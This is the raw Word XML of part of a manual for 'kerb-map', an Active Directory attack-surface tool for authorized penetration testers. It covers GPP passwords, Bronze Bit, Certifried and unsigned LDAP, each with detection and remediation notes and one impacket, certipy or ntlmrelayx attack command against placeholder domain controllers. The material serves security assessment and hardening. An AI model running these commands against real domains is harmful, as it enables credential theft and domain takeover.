            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561337" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 4 — Re-run With Elevated Creds</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561337 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>21</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4267D63F" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561338" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 5 — Use the JSON Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561338 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>21</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2492FDC7" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561339" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.  Project Structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561339 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>22</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="361E901D" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561340" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.  Extending kerb-map</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561340 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>23</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D8B73B0" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561341" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.1  Adding a New CVE Module</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561341 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>23</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79E207E4" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561342" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.2  Adding a New Enumeration Module</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561342 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>23</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F55B7AD" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561343" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.3  Customising the Scorer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561343 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>23</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46745FCF" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561344" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.  Legal Disclaimer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561344 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>24</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="798C5AB1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="10000023" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000024" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc224561360"/>
      <w:r>
        <w:t>5.7  GPP Passwords — MS14-025</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="10000025" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Group Policy Preferences created before KB2962486 may store passwords encrypted with a publicly known AES key. Any domain user can read SYSVOL and decrypt these passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000026" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000027" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection: Queries all groupPolicyContainer objects via LDAP and checks gPCFileSysPath attributes for SYSVOL paths containing potential cpassword XML files (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000028" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000029" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Remediation: Apply KB2962486, delete existing GPP XML files containing cpassword, reset affected passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000002A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000002B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Get-GPPPassword.py domain/user:pass@DC_IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20000013" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000014" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc224561361"/>
      <w:r>
        <w:t>5.8  Bronze Bit — CVE-2020-17049</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="20000015" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Bypasses the S4U2Self forwardable flag validation in constrained delegation. An attacker with a constrained delegation account can impersonate any user to any service in the delegation list, even without protocol transition enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000016" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000017" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection: Checks if constrained delegation accounts exist AND the domain functional level suggests the patch (KB4598347) has not been applied (DFL &lt; 7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000018" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000002C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Remediation: Apply KB4598347 on all DCs, set PerformTicketSignature=2 registry key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000002D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000002E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>getST.py -spn TARGET_SPN -impersonate Administrator -force-forwardable -dc-ip DC_IP domain/user:pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1000002F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000030" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc224561362"/>
      <w:r>
        <w:t>5.9  Certifried — CVE-2022-26923</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="10000031" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Any domain user can create a machine account (if MachineAccountQuota &gt; 0), set its dNSHostName to match a DC, request a certificate, and authenticate as the DC — full domain compromise. Severity: CRITICAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000032" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000033" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection: Checks three conditions via LDAP: (1) AD CS enrollment services exist, (2) ms-DS-MachineAccountQuota &gt; 0, (3) domain appears unpatched (DFL &lt; 7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000034" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000035" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Remediation: Apply KB5014754 (May 2022 updates), set MachineAccountQuota=0, enable strong certificate mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000019" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2000001A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>certipy account create -u user@domain -p pass -dc-ip DC_IP -user FAKE$ -dns DC_FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2000001B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000001C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc224561363"/>
      <w:r>
        <w:t>5.10  LDAP Signing Not Required</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="2000001D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>If LDAP signing is not enforced on the DC, NTLM relay attacks to LDAP are possible (ntlmrelayx, mitm6, Responder). This enables privilege escalation via RBCD or delegation abuse. Severity: HIGH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000001E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000036" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection: Checks whether the current LDAP connection was established without signing (port 389 vs 636/LDAPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000037" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000038" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Remediation: Set “Domain controller: LDAP server signing requirements” to “Require signing” via GPO. Enable LDAP channel binding (LdapEnforceChannelBinding=2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10000039" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1000003A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ntlmrelayx.py -t ldap://DC_IP --delegate-access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="188037FB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F05F72" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc224561281"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.  Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="658A41EC" w14:textId="54D8CE51" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map is an Active Directory enumeration and attack surface mapping tool written in Python. It is designed for use by penetration testers and red team operators during authorized engagements against Windows domain environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040FECB4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8736E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Unlike running a collection of impacket scripts manually, kerb-map consolidates every Kerberos-related attack surface into a single authenticated scan and produces a ranked, prioritised hit list telling you exactly where to start and what command to run next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63712C15" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B51BD7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc224561282"/>
      <w:r>
        <w:t>1.1  What kerb-map Does</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="49F9C466" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>In a single authenticated LDAP session, kerb-map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF046DD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Discovers every Kerberoastable account (SPN holders) and scores each by crackability</w:t>
      </w:r>
    </w:p>
